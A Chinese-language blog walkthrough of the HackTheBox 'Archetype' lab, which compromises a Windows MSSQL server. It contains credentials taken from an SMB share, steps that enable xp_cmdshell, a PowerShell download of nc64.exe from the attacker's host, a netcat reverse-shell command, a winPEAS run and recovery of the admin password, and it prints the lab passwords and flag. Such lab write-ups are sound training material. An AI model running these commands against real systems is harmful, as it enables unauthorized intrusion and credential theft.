HTB-Archetype

开局先找汉语教：

HTB_Archetype靶机之sqlserver提权_重返太空的博客-CSDN博客

https://www.czfq99.cn/archives/94.html

看了下标题好像是SQLSERVER的提权。

开始了，开局先扫端口吧，看看开启了哪些：

┌──(kali㉿kali)-[~]
└─$ nmap -sV 10.129.121.52                     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 04:02 EDT
Nmap scan report for 10.129.121.52
Host is up (0.37s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.41 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.168.67                                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-18 03:34 EDT
Nmap scan report for 10.129.168.67
Host is up (0.37s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-07-18T06:36:33
|_Not valid after:  2053-07-18T06:36:33
|_ssl-date: 2023-07-18T07:37:27+00:00; -1s from scanner time.
| ms-sql-info: 
|   10.129.168.67:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.168.67:1433: 
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m52s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-07-18T00:37:03-07:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-07-18T07:37:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.12 seconds

开了135、139、445、1433，第三个Dancing靶机有介绍过SSM的。

135 端口是远程过程调用 (RPC) 端口，Client-Server Model(客户端-服务器应用程序)
139 端口是 netbios-ssn，NetBIOS 是在所有当前版本 Windows 下用于文件和打印共享的协议，默认情况下，启用文件和打印共享后，会绑定到所有内容，包括 TCP/IP ,这意味着除非配置不当的情况下，可以在互联网上访问本地的共享资源
445 端口 microsoft-ds 服务，也是 Client-Server Model，用于直接 TCP/IP MS 网络访问，无需 NetBIOS 层，SMB 协议用于 Windows NT/2K/XP 和更高版本中的文件共享

使用命令行工具 smbclient 进行连接，使用 -L 命令显示服务器端分享的资源。

密码为空，直接进看看。

┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.129.121.52                                                                 
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.121.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

有了Dancing的经验直接连backups，无密码直连，下载prod.dtsConfig文件到本地再看：

┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.129.121.52\\backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2616219 blocks available
smb: \> cat prod.dtsConfig
cat: command not found
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

这到底是什么东西啊

┌──(kali㉿kali)-[~]
└─$ cat prod.dtsConfig 
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

噢，是sql server，关系型数据库

同时发现敏感信息(mssql的账号密码)

ID:ARCHETYPE\sql_svc

Password:M3g4c0rp123

如何连接呢，使用推荐工具 impacket 包连接，kali 中自带，windwos 可以使用 sqlserver management 桌面管理工具。

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient -h
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                      target

TDS client implementation (SSL supported).

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON
  -file FILE            input file with commands to execute in the SQL shell

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based
                        on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN)
                        specified in the target parameter

有了账户密码直连就行：

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc@10.129.121.52
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

这数据库似乎也没什么东西，下一步就是提权。

使用xp_cmdshell工具执行系统命令，xp_cmdshell 可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串，是 sql servevr 的原生工具。

然后报错发现没开启权限：

1
2
3

xp_cmdshell "whoami"

[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near '>'.

使用如下命令修改配置：

SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;

SQL> SELECT is_srvrolemember('sysadmin');


-----------   

          1   

SQL> EXEC xp_cmdshell 'net user';
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure; - Enabling the sp_configure as stated in the above error message
[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near '-'.
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> xp_cmdshell "whoami"
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL

查看当前目录

SQL> xp_cmdshell "powershell -c pwd"
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

Path                                                                               

----                                                                               

C:\Windows\system32                                                                

NULL                                                                               

NULL                                                                               

NULL                                                                               

SQL>

网慢的不行，下载菜刀64都是在自己机子开VPN下的，而且放在桌面不行，必须要把菜刀放在当前路径下，

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe"
output                                                                             

--------------------------------------------------------------------------------   

wget : <!DOCTYPE HTML>                                                             

<html lang="en">                                                                   

    <head>                                                                         

        <meta charset="utf-8">                                                     

        <title>Error response</title>                                              

    </head>                                                                        

    <body>                                                                         

        <h1>Error response</h1>                                                    

        <p>Error code: 404</p>                                                     

        <p>Message: File not found.</p>                                            

        <p>Error code explanation: 404 - Nothing matches the given URI.</p>        

    </body>                                                                        

</html>                                                                            

At line:1 char:32                                                                  

+ ... sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe        

+                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        

    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc    

   eption                                                                          

    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand   

NULL                                                                               

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe"
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

SQL>

监听终于返回200成功

┌──(kali㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for kali: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.168.67 - - [18/Jul/2023 04:26:15] code 404, message File not found
10.129.168.67 - - [18/Jul/2023 04:26:15] "GET /nc64.exe HTTP/1.1" 404 -
10.129.168.67 - - [18/Jul/2023 04:39:58] code 404, message File not found
10.129.168.67 - - [18/Jul/2023 04:39:58] "GET /nc64.exe HTTP/1.1" 404 -
10.129.168.67 - - [18/Jul/2023 04:41:07] "GET /nc64.exe HTTP/1.1" 200 -

现在，我们可以通过nc将cmd.exe绑定到我们的侦听器

1	`SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443"`

下面直接看nc监听443端口，获取到了shell会话：

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.10.14.68] from (UNKNOWN) [10.129.168.67] 49678
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Downloads

07/18/2023  01:41 AM    <DIR>          .
07/18/2023  01:41 AM    <DIR>          ..
07/18/2023  01:41 AM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)  10,714,288,128 bytes free

C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc

还是没权限，哈哈

介绍提权工具：WINPEAS，还是开VPN下载的，windows还要关病毒防护

然后在监听处发现200成功：

C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.68/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.68/winPEASx64.exe -outfile winPEASx64.exe

10.129.168.67 - - [18/Jul/2023 05:09:58] "GET /winPEASx64.exe HTTP/1.1" 200 -

C:\Users\sql_svc\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Downloads

07/18/2023  02:09 AM    <DIR>          .
07/18/2023  02:09 AM    <DIR>          ..
07/18/2023  01:41 AM            45,272 nc64.exe
07/18/2023  02:06 AM                 0 powershell
07/18/2023  02:10 AM         1,930,752 winPEASx64.exe
               3 File(s)      1,976,024 bytes
               2 Dir(s)  10,710,515,712 bytes free

使用命令运行提权工具，最后显示：

����������͹ Analyzing Other Windows Files Files (limit 70)

       /---------------------------------------------------------------------------\                         
       |                             Do you like PEASS?                            |                         
       |---------------------------------------------------------------------------|                         
       |         Become a Patreon    :     https://www.patreon.com/peass           |                         
       |         Follow on Twitter   :     @carlospolopm                           |                         
       |         Respect on HTB      :     SirBroccoli & makikvues                 |                         
       |---------------------------------------------------------------------------|                         
       |                                 Thank you!                                |                         
       \---------------------------------------------------------------------------/

密码：MEGACORP_4dm1n!!

C:\Users\sql_svc\Downloads>cd ..
cd ..

C:\Users\sql_svc>cd AppData
cd AppData

C:\Users\sql_svc\AppData>cd \Roaming\Microsoft\Windows\PowerShell\PSReadline\  
cd \Roaming\Microsoft\Windows\PowerShell\PSReadline\
The system cannot find the path specified.

C' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\sql_svc\AppData>cd Roaming\Microsoft\Windows\PowerShell\PSReadline\               
cd Roaming\Microsoft\Windows\PowerShell\PSReadline\

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

01/20/2020  06:04 AM    <DIR>          .
01/20/2020  06:04 AM    <DIR>          ..
03/17/2020  02:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  10,710,208,512 bytes free

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>type ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>python3 psexec.py administrator@10.129.168.67
python3 psexec.py administrator@10.129.168.67
'python3' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

C:\Windows\system32> cd ..

C:\Windows> cd ..

C:\> cd User
The system cannot find the path specified.

C:\> cd Users

C:\Users> cd Administartor
The system cannot find the path specified.

C:\Users> cd Administrator

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528

PWN

本文由FlowsecNagi编写，采用非商业性使用-相同方式共享 4.0 国际](https://creativecommons.org/licenses/by-nc-sa/4.0/) 许可协议，转载请注明出处。